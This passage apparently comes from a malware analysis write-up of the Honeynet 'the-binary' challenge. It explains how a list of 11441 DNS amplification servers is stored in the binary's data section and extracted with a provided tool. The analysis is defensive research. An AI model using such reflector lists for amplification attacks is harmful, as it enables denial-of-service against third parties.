amplifiers. They start from 0x806d22c which corresponds to four bytes after
the start of the .data section. Accordingly, the file offset for these is
0x2422c bytes, with the number in little endian word ordering.
For instance:
000c 0282 = 0c.00.82.02 = 12.0.130.2
A file (dnsrip.c) has been provided that works with the HoneyNet supplied
binary ONLY.
exploit-dev:/reverse# ./dnsrip the-binary | wc -l
11441
A simple shell script can be used to resolve each of these IPs. Due to the
size of the list (11441 servers!) the output is not included here, but can be
found in DNS_Amplification_Servers.